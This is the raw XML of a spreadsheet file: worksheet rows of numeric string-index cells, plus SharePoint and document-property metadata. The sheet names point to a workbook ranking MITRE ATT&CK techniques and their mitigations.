      <c r="J16617" s="18" t="s">
        <v>41309</v>
      </c>
      <c r="K16617" s="18" t="s">
        <v>41310</v>
      </c>
      <c r="L16617" s="18" t="s">
        <v>2842</v>
      </c>
      <c r="M16617" s="18" t="s">
        <v>14920</v>
      </c>
    </row>
    <row r="16618" spans="1:13">
      <c r="A16618" s="18" t="s">
        <v>41302</v>
      </c>
      <c r="B16618" s="18" t="s">
        <v>41303</v>
      </c>
      <c r="C16618" s="18" t="s">
        <v>41304</v>
      </c>
      <c r="D16618" s="18" t="s">
        <v>12061</v>
      </c>
      <c r="E16618" s="18" t="s">
        <v>12057</v>
      </c>
      <c r="F16618" s="18" t="s">
        <v>579</v>
      </c>
      <c r="G16618" s="18" t="s">
        <v>580</v>
      </c>
      <c r="H16618" s="18" t="s">
        <v>5978</v>
      </c>
      <c r="I16618" s="18" t="s">
        <v>5235</v>
      </c>
      <c r="J16618" s="18" t="s">
        <v>41311</v>
      </c>
      <c r="K16618" s="18" t="s">
        <v>41312</v>
      </c>
      <c r="L16618" s="18" t="s">
        <v>2842</v>
      </c>
      <c r="M16618" s="18" t="s">
        <v>14920</v>
      </c>
    </row>
    <row r="16619" spans="1:13">
      <c r="A16619" s="18" t="s">
        <v>41302</v>
      </c>
      <c r="B16619" s="18" t="s">
        <v>41303</v>
      </c>
      <c r="C16619" s="18" t="s">
        <v>41304</v>
      </c>
      <c r="D16619" s="18" t="s">
        <v>12061</v>
      </c>
      <c r="E16619" s="18" t="s">
        <v>12057</v>
      </c>
      <c r="F16619" s="18" t="s">
        <v>411</v>
      </c>
      <c r="G16619" s="18" t="s">
        <v>412</v>
      </c>
      <c r="H16619" s="18" t="s">
        <v>6552</v>
      </c>
      <c r="I16619" s="18" t="s">
        <v>5235</v>
      </c>
      <c r="J16619" s="18" t="s">
        <v>41313</v>
      </c>
      <c r="K16619" s="18" t="s">
        <v>41314</v>
      </c>
      <c r="L16619" s="18" t="s">
        <v>2842</v>
      </c>
      <c r="M16619" s="18" t="s">
        <v>2244</v>
      </c>
    </row>
    <row r="16620" spans="1:13">
      <c r="A16620" s="18" t="s">
        <v>41302</v>
      </c>
      <c r="B16620" s="18" t="s">
        <v>41303</v>
      </c>
      <c r="C16620" s="18" t="s">
        <v>41304</v>
      </c>
      <c r="D16620" s="18" t="s">
        <v>12061</v>
      </c>
      <c r="E16620" s="18" t="s">
        <v>12057</v>
      </c>
      <c r="F16620" s="18" t="s">
        <v>426</v>
      </c>
      <c r="G16620" s="18" t="s">
        <v>427</v>
      </c>
      <c r="H16620" s="18" t="s">
        <v>6216</v>
      </c>
      <c r="I16620" s="18" t="s">
        <v>5235</v>
      </c>
      <c r="J16620" s="18" t="s">
        <v>41315</v>
      </c>
      <c r="K16620" s="18" t="s">
        <v>41316</v>
      </c>
      <c r="L16620" s="18" t="s">
        <v>2842</v>
      </c>
      <c r="M16620" s="18" t="s">
        <v>14920</v>
      </c>
    </row>
    <row r="16621" spans="1:13">
      <c r="A16621" s="18" t="s">
        <v>41302</v>
      </c>
      <c r="B16621" s="18" t="s">
        <v>41303</v>
      </c>
      <c r="C16621" s="18" t="s">
        <v>41304</v>
      </c>
      <c r="D16621" s="18" t="s">
        <v>12061</v>
      </c>
      <c r="E16621" s="18" t="s">
        <v>12057</v>
      </c>
      <c r="F16621" s="18" t="s">
        <v>160</v>
      </c>
      <c r="G16621" s="18" t="s">
        <v>161</v>
      </c>
      <c r="H16621" s="18" t="s">
        <v>6256</v>
      </c>
      <c r="I16621" s="18" t="s">
        <v>5235</v>
      </c>
      <c r="J16621" s="18" t="s">
        <v>41317</v>
      </c>
      <c r="K16621" s="18" t="s">
        <v>41318</v>
      </c>
      <c r="L16621" s="18" t="s">
        <v>2842</v>
      </c>
      <c r="M16621" s="18" t="s">
        <v>14920</v>
      </c>
    </row>
    <row r="16622" spans="1:13">
      <c r="A16622" s="18" t="s">
        <v>41302</v>
      </c>
      <c r="B16622" s="18" t="s">
        <v>41303</v>
      </c>
      <c r="C16622" s="18" t="s">
        <v>41304</v>
      </c>
      <c r="D16622" s="18" t="s">
        <v>12061</v>
      </c>
      <c r="E16622" s="18" t="s">
        <v>12057</v>
      </c>
      <c r="F16622" s="18" t="s">
        <v>357</v>
      </c>
      <c r="G16622" s="18" t="s">
        <v>358</v>
      </c>
      <c r="H16622" s="18" t="s">
        <v>6290</v>
      </c>
      <c r="I16622" s="18" t="s">
        <v>5235</v>
      </c>
      <c r="J16622" s="18" t="s">
        <v>41319</v>
      </c>
      <c r="K16622" s="18" t="s">
        <v>41320</v>
      </c>
      <c r="L16622" s="18" t="s">
        <v>2842</v>
      </c>
      <c r="M16622" s="18" t="s">
        <v>10161</v>
      </c>
    </row>
    <row r="16623" spans="1:13">
      <c r="A16623" s="18" t="s">
        <v>41302</v>
      </c>
      <c r="B16623" s="18" t="s">
        <v>41303</v>
      </c>
      <c r="C16623" s="18" t="s">
        <v>41304</v>
      </c>
      <c r="D16623" s="18" t="s">
        <v>12061</v>
      </c>
      <c r="E16623" s="18" t="s">
        <v>12057</v>
      </c>
      <c r="F16623" s="18" t="s">
        <v>699</v>
      </c>
      <c r="G16623" s="18" t="s">
        <v>700</v>
      </c>
      <c r="H16623" s="18" t="s">
        <v>6296</v>
      </c>
      <c r="I16623" s="18" t="s">
        <v>5235</v>
      </c>
      <c r="J16623" s="18" t="s">
        <v>41321</v>
      </c>
      <c r="K16623" s="18" t="s">
        <v>41322</v>
      </c>
      <c r="L16623" s="18" t="s">
        <v>2842</v>
      </c>
      <c r="M16623" s="18" t="s">
        <v>14920</v>
      </c>
    </row>
    <row r="16624" spans="1:13">
      <c r="A16624" s="18" t="s">
        <v>41302</v>
      </c>
      <c r="B16624" s="18" t="s">
        <v>41303</v>
      </c>
      <c r="C16624" s="18" t="s">
        <v>41304</v>
      </c>
      <c r="D16624" s="18" t="s">
        <v>12061</v>
      </c>
      <c r="E16624" s="18" t="s">
        <v>12057</v>
      </c>
      <c r="F16624" s="18" t="s">
        <v>219</v>
      </c>
      <c r="G16624" s="18" t="s">
        <v>220</v>
      </c>
      <c r="H16624" s="18" t="s">
        <v>6993</v>
      </c>
      <c r="I16624" s="18" t="s">
        <v>5235</v>
      </c>
      <c r="J16624" s="18" t="s">
        <v>41323</v>
      </c>
      <c r="K16624" s="18" t="s">
        <v>41324</v>
      </c>
      <c r="L16624" s="18" t="s">
        <v>2842</v>
      </c>
      <c r="M16624" s="18" t="s">
        <v>14920</v>
      </c>
    </row>
    <row r="16625" spans="1:13">
      <c r="A16625" s="18" t="s">
        <v>41302</v>
      </c>
      <c r="B16625" s="18" t="s">
        <v>41303</v>
      </c>
      <c r="C16625" s="18" t="s">
        <v>41304</v>
      </c>
      <c r="D16625" s="18" t="s">
        <v>12061</v>
      </c>
      <c r="E16625" s="18" t="s">
        <v>12057</v>
      </c>
      <c r="F16625" s="18" t="s">
        <v>1073</v>
      </c>
      <c r="G16625" s="18" t="s">
        <v>1074</v>
      </c>
      <c r="H16625" s="18" t="s">
        <v>6344</v>
      </c>
      <c r="I16625" s="18" t="s">
        <v>5235</v>
      </c>
      <c r="J16625" s="18" t="s">
        <v>41325</v>
      </c>
      <c r="K16625" s="18" t="s">
        <v>41326</v>
      </c>
      <c r="L16625" s="18" t="s">
        <v>15474</v>
      </c>
      <c r="M16625" s="18" t="s">
        <v>2244</v>
      </c>
    </row>
    <row r="16626" spans="1:13">
      <c r="A16626" s="18" t="s">
        <v>41302</v>
      </c>
      <c r="B16626" s="18" t="s">
        <v>41303</v>
      </c>
      <c r="C16626" s="18" t="s">
        <v>41304</v>
      </c>
      <c r="D16626" s="18" t="s">
        <v>12061</v>
      </c>
      <c r="E16626" s="18" t="s">
        <v>12057</v>
      </c>
      <c r="F16626" s="18" t="s">
        <v>577</v>
      </c>
      <c r="G16626" s="18" t="s">
        <v>578</v>
      </c>
      <c r="H16626" s="18" t="s">
        <v>6347</v>
      </c>
      <c r="I16626" s="18" t="s">
        <v>5235</v>
      </c>
      <c r="J16626" s="18" t="s">
        <v>41327</v>
      </c>
      <c r="K16626" s="18" t="s">
        <v>41328</v>
      </c>
      <c r="L16626" s="18" t="s">
        <v>2842</v>
      </c>
      <c r="M16626" s="18" t="s">
        <v>14920</v>
      </c>
    </row>
    <row r="16627" spans="1:13">
      <c r="A16627" s="18" t="s">
        <v>41302</v>
      </c>
      <c r="B16627" s="18" t="s">
        <v>41303</v>
      </c>
      <c r="C16627" s="18" t="s">
        <v>41304</v>
      </c>
      <c r="D16627" s="18" t="s">
        <v>12061</v>
      </c>
      <c r="E16627" s="18" t="s">
        <v>12057</v>
      </c>
      <c r="F16627" s="18" t="s">
        <v>154</v>
      </c>
      <c r="G16627" s="18" t="s">
        <v>155</v>
      </c>
      <c r="H16627" s="18" t="s">
        <v>6356</v>
      </c>
      <c r="I16627" s="18" t="s">
        <v>5235</v>
      </c>
      <c r="J16627" s="18" t="s">
        <v>41329</v>
      </c>
      <c r="K16627" s="18" t="s">
        <v>41330</v>
      </c>
      <c r="L16627" s="18" t="s">
        <v>2842</v>
      </c>
      <c r="M16627" s="18" t="s">
        <v>14920</v>
      </c>
    </row>
    <row r="16628" spans="1:13">
      <c r="A16628" s="18" t="s">
        <v>41302</v>
      </c>
      <c r="B16628" s="18" t="s">
        <v>41303</v>
      </c>
      <c r="C16628" s="18" t="s">
        <v>41304</v>
      </c>
      <c r="D16628" s="18" t="s">
        <v>12061</v>
      </c>
      <c r="E16628" s="18" t="s">
        <v>12057</v>
      </c>
      <c r="F16628" s="18" t="s">
        <v>243</v>
      </c>
      <c r="G16628" s="18" t="s">
        <v>244</v>
      </c>
      <c r="H16628" s="18" t="s">
        <v>5292</v>
      </c>
      <c r="I16628" s="18" t="s">
        <v>5235</v>
      </c>
      <c r="J16628" s="18" t="s">
        <v>41331</v>
      </c>
      <c r="K16628" s="18" t="s">
        <v>41332</v>
      </c>
      <c r="L16628" s="18" t="s">
        <v>2842</v>
      </c>
      <c r="M16628" s="18" t="s">
        <v>14920</v>
      </c>
    </row>
    <row r="16629" spans="1:13">
      <c r="A16629" s="18" t="s">
        <v>12318</v>
      </c>
      <c r="B16629" s="18" t="s">
        <v>12319</v>
      </c>
      <c r="C16629" s="18" t="s">
        <v>12320</v>
      </c>
      <c r="D16629" s="18" t="s">
        <v>12061</v>
      </c>
      <c r="E16629" s="18" t="s">
        <v>12057</v>
      </c>
      <c r="F16629" s="18" t="s">
        <v>504</v>
      </c>
      <c r="G16629" s="18" t="s">
        <v>505</v>
      </c>
      <c r="H16629" s="18" t="s">
        <v>5975</v>
      </c>
      <c r="I16629" s="18" t="s">
        <v>5235</v>
      </c>
      <c r="J16629" s="18" t="s">
        <v>41333</v>
      </c>
      <c r="K16629" s="18" t="s">
        <v>41334</v>
      </c>
      <c r="L16629" s="18" t="s">
        <v>13723</v>
      </c>
      <c r="M16629" s="18" t="s">
        <v>13791</v>
      </c>
    </row>
    <row r="16630" spans="1:13">
      <c r="A16630" s="18" t="s">
        <v>12318</v>
      </c>
      <c r="B16630" s="18" t="s">
        <v>12319</v>
      </c>
      <c r="C16630" s="18" t="s">
        <v>12320</v>
      </c>
      <c r="D16630" s="18" t="s">
        <v>12061</v>
      </c>
      <c r="E16630" s="18" t="s">
        <v>12057</v>
      </c>
      <c r="F16630" s="18" t="s">
        <v>579</v>
      </c>
      <c r="G16630" s="18" t="s">
        <v>580</v>
      </c>
      <c r="H16630" s="18" t="s">
        <v>5978</v>
      </c>
      <c r="I16630" s="18" t="s">
        <v>5235</v>
      </c>
      <c r="J16630" s="18" t="s">
        <v>41335</v>
      </c>
      <c r="K16630" s="18" t="s">
        <v>41336</v>
      </c>
      <c r="L16630" s="18" t="s">
        <v>13723</v>
      </c>
      <c r="M16630" s="18" t="s">
        <v>13791</v>
      </c>
    </row>
    <row r="16631" spans="1:13">
      <c r="A16631" s="18" t="s">
        <v>12318</v>
      </c>
      <c r="B16631" s="18" t="s">
        <v>12319</v>
      </c>
      <c r="C16631" s="18" t="s">
        <v>12320</v>
      </c>
      <c r="D16631" s="18" t="s">
        <v>12061</v>
      </c>
      <c r="E16631" s="18" t="s">
        <v>12057</v>
      </c>
      <c r="F16631" s="18" t="s">
        <v>695</v>
      </c>
      <c r="G16631" s="18" t="s">
        <v>696</v>
      </c>
      <c r="H16631" s="18" t="s">
        <v>6129</v>
      </c>
      <c r="I16631" s="18" t="s">
        <v>5235</v>
      </c>
      <c r="J16631" s="18" t="s">
        <v>41337</v>
      </c>
      <c r="K16631" s="18" t="s">
        <v>41338</v>
      </c>
      <c r="L16631" s="18" t="s">
        <v>13723</v>
      </c>
      <c r="M16631" s="18" t="s">
        <v>13791</v>
      </c>
    </row>
    <row r="16632" spans="1:13">
      <c r="A16632" s="18" t="s">
        <v>12318</v>
      </c>
      <c r="B16632" s="18" t="s">
        <v>12319</v>
      </c>
      <c r="C16632" s="18" t="s">
        <v>12320</v>
      </c>
      <c r="D16632" s="18" t="s">
        <v>12061</v>
      </c>
      <c r="E16632" s="18" t="s">
        <v>12057</v>
      </c>
      <c r="F16632" s="18" t="s">
        <v>175</v>
      </c>
      <c r="G16632" s="18" t="s">
        <v>176</v>
      </c>
      <c r="H16632" s="18" t="s">
        <v>7496</v>
      </c>
      <c r="I16632" s="18" t="s">
        <v>5235</v>
      </c>
      <c r="J16632" s="18" t="s">
        <v>41339</v>
      </c>
      <c r="K16632" s="18" t="s">
        <v>41340</v>
      </c>
      <c r="L16632" s="18" t="s">
        <v>13723</v>
      </c>
      <c r="M16632" s="18" t="s">
        <v>13791</v>
      </c>
    </row>
    <row r="16633" spans="1:13">
      <c r="A16633" s="18" t="s">
        <v>12318</v>
      </c>
      <c r="B16633" s="18" t="s">
        <v>12319</v>
      </c>
      <c r="C16633" s="18" t="s">
        <v>12320</v>
      </c>
      <c r="D16633" s="18" t="s">
        <v>12061</v>
      </c>
      <c r="E16633" s="18" t="s">
        <v>12057</v>
      </c>
      <c r="F16633" s="18" t="s">
        <v>180</v>
      </c>
      <c r="G16633" s="18" t="s">
        <v>181</v>
      </c>
      <c r="H16633" s="18" t="s">
        <v>6278</v>
      </c>
      <c r="I16633" s="18" t="s">
        <v>5235</v>
      </c>
      <c r="J16633" s="18" t="s">
        <v>41341</v>
      </c>
      <c r="K16633" s="18" t="s">
        <v>41342</v>
      </c>
      <c r="L16633" s="18" t="s">
        <v>13723</v>
      </c>
      <c r="M16633" s="18" t="s">
        <v>13791</v>
      </c>
    </row>
    <row r="16634" spans="1:13">
      <c r="A16634" s="18" t="s">
        <v>12318</v>
      </c>
      <c r="B16634" s="18" t="s">
        <v>12319</v>
      </c>
      <c r="C16634" s="18" t="s">
        <v>12320</v>
      </c>
      <c r="D16634" s="18" t="s">
        <v>12061</v>
      </c>
      <c r="E16634" s="18" t="s">
        <v>12057</v>
      </c>
      <c r="F16634" s="18" t="s">
        <v>357</v>
      </c>
      <c r="G16634" s="18" t="s">
        <v>358</v>
      </c>
      <c r="H16634" s="18" t="s">
        <v>6290</v>
      </c>
      <c r="I16634" s="18" t="s">
        <v>5235</v>
      </c>
      <c r="J16634" s="18" t="s">
        <v>41343</v>
      </c>
      <c r="K16634" s="18" t="s">
        <v>41344</v>
      </c>
      <c r="L16634" s="18" t="s">
        <v>13723</v>
      </c>
      <c r="M16634" s="18" t="s">
        <v>13791</v>
      </c>
    </row>
    <row r="16635" spans="1:13">
      <c r="A16635" s="18" t="s">
        <v>12318</v>
      </c>
      <c r="B16635" s="18" t="s">
        <v>12319</v>
      </c>
      <c r="C16635" s="18" t="s">
        <v>12320</v>
      </c>
      <c r="D16635" s="18" t="s">
        <v>12061</v>
      </c>
      <c r="E16635" s="18" t="s">
        <v>12057</v>
      </c>
      <c r="F16635" s="18" t="s">
        <v>577</v>
      </c>
      <c r="G16635" s="18" t="s">
        <v>578</v>
      </c>
      <c r="H16635" s="18" t="s">
        <v>6347</v>
      </c>
      <c r="I16635" s="18" t="s">
        <v>5235</v>
      </c>
      <c r="J16635" s="18" t="s">
        <v>41345</v>
      </c>
      <c r="K16635" s="18" t="s">
        <v>41346</v>
      </c>
      <c r="L16635" s="18" t="s">
        <v>13723</v>
      </c>
      <c r="M16635" s="18" t="s">
        <v>13791</v>
      </c>
    </row>
    <row r="16636" spans="1:13">
      <c r="A16636" s="18" t="s">
        <v>12318</v>
      </c>
      <c r="B16636" s="18" t="s">
        <v>12319</v>
      </c>
      <c r="C16636" s="18" t="s">
        <v>12320</v>
      </c>
      <c r="D16636" s="18" t="s">
        <v>12061</v>
      </c>
      <c r="E16636" s="18" t="s">
        <v>12057</v>
      </c>
      <c r="F16636" s="18" t="s">
        <v>154</v>
      </c>
      <c r="G16636" s="18" t="s">
        <v>155</v>
      </c>
      <c r="H16636" s="18" t="s">
        <v>6356</v>
      </c>
      <c r="I16636" s="18" t="s">
        <v>5235</v>
      </c>
      <c r="J16636" s="18" t="s">
        <v>41347</v>
      </c>
      <c r="K16636" s="18" t="s">
        <v>41348</v>
      </c>
      <c r="L16636" s="18" t="s">
        <v>13723</v>
      </c>
      <c r="M16636" s="18" t="s">
        <v>13791</v>
      </c>
    </row>
    <row r="16637" spans="1:13">
      <c r="A16637" s="18" t="s">
        <v>12318</v>
      </c>
      <c r="B16637" s="18" t="s">
        <v>12319</v>
      </c>
      <c r="C16637" s="18" t="s">
        <v>12320</v>
      </c>
      <c r="D16637" s="18" t="s">
        <v>12061</v>
      </c>
      <c r="E16637" s="18" t="s">
        <v>12057</v>
      </c>
      <c r="F16637" s="18" t="s">
        <v>243</v>
      </c>
      <c r="G16637" s="18" t="s">
        <v>244</v>
      </c>
      <c r="H16637" s="18" t="s">
        <v>5292</v>
      </c>
      <c r="I16637" s="18" t="s">
        <v>5235</v>
      </c>
      <c r="J16637" s="18" t="s">
        <v>41349</v>
      </c>
      <c r="K16637" s="18" t="s">
        <v>41350</v>
      </c>
      <c r="L16637" s="18" t="s">
        <v>13723</v>
      </c>
      <c r="M16637" s="18" t="s">
        <v>13791</v>
      </c>
    </row>
    <row r="16638" spans="1:13">
      <c r="A16638" s="18" t="s">
        <v>12318</v>
      </c>
      <c r="B16638" s="18" t="s">
        <v>12319</v>
      </c>
      <c r="C16638" s="18" t="s">
        <v>12320</v>
      </c>
      <c r="D16638" s="18" t="s">
        <v>12061</v>
      </c>
      <c r="E16638" s="18" t="s">
        <v>12057</v>
      </c>
      <c r="F16638" s="18" t="s">
        <v>441</v>
      </c>
      <c r="G16638" s="18" t="s">
        <v>442</v>
      </c>
      <c r="H16638" s="18" t="s">
        <v>6429</v>
      </c>
      <c r="I16638" s="18" t="s">
        <v>5235</v>
      </c>
      <c r="J16638" s="18" t="s">
        <v>41351</v>
      </c>
      <c r="K16638" s="18" t="s">
        <v>41352</v>
      </c>
      <c r="L16638" s="18" t="s">
        <v>13723</v>
      </c>
      <c r="M16638" s="18" t="s">
        <v>13791</v>
      </c>
    </row>
    <row r="16639" spans="1:13">
      <c r="A16639" s="18" t="s">
        <v>12318</v>
      </c>
      <c r="B16639" s="18" t="s">
        <v>12319</v>
      </c>
      <c r="C16639" s="18" t="s">
        <v>12320</v>
      </c>
      <c r="D16639" s="18" t="s">
        <v>12061</v>
      </c>
      <c r="E16639" s="18" t="s">
        <v>12057</v>
      </c>
      <c r="F16639" s="18" t="s">
        <v>1209</v>
      </c>
      <c r="G16639" s="18" t="s">
        <v>1210</v>
      </c>
      <c r="H16639" s="18" t="s">
        <v>6446</v>
      </c>
      <c r="I16639" s="18" t="s">
        <v>5235</v>
      </c>
      <c r="J16639" s="18" t="s">
        <v>41353</v>
      </c>
      <c r="K16639" s="18" t="s">
        <v>41354</v>
      </c>
      <c r="L16639" s="18" t="s">
        <v>13723</v>
      </c>
      <c r="M16639" s="18" t="s">
        <v>13791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8F9CA2C931407438EFF90C87B8709EF" ma:contentTypeVersion="10" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="79085bf53ecd156cbc564b9c5c36fce7">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="be73663c-8105-4af6-a61c-47faa432744b" xmlns:ns3="4c622557-c38d-4062-b649-92ea36d3df87" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="da0383f9a0dcbae71ef1676808d29807" ns2:_="" ns3:_="">
    <xsd:import namespace="be73663c-8105-4af6-a61c-47faa432744b"/>
    <xsd:import namespace="4c622557-c38d-4062-b649-92ea36d3df8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e73663c-8105-4af6-a61c-47faa432744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c622557-c38d-4062-b649-92ea36d3df87"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6C89E003-E3FB-401B-8760-D14599C1D5A9}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{59C36EFA-8AED-4742-9CEF-8A70F9617A3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e73663c-8105-4af6-a61c-47faa432744b"/>
    <ds:schemaRef ds:uri="4c622557-c38d-4062-b649-92ea36d3df8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81AAC2E-03C4-480A-96B4-5396597FA944}">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TOP 10 TECHNIQUES</vt:lpstr>
      <vt:lpstr>Methodology</vt:lpstr>
      <vt:lpstr>Score</vt:lpstr>
      <vt:lpstr>techniques</vt:lpstr>
      <vt:lpstr>parameters</vt:lpstr>
      <vt:lpstr>Current Version of ATT&amp;CK</vt:lpstr>
      <vt:lpstr>mitigations</vt:lpstr>
      <vt:lpstr>relationships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Allison F Robbins</cp:lastModifiedBy>
  <cp:revision/>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-01-13T14:59:20Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-06-10T18:07:50Z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0x01010038F9CA2C931407438EFF90C87B8709EF</vt:lpwstr>
  </property>
</Properties>
</file>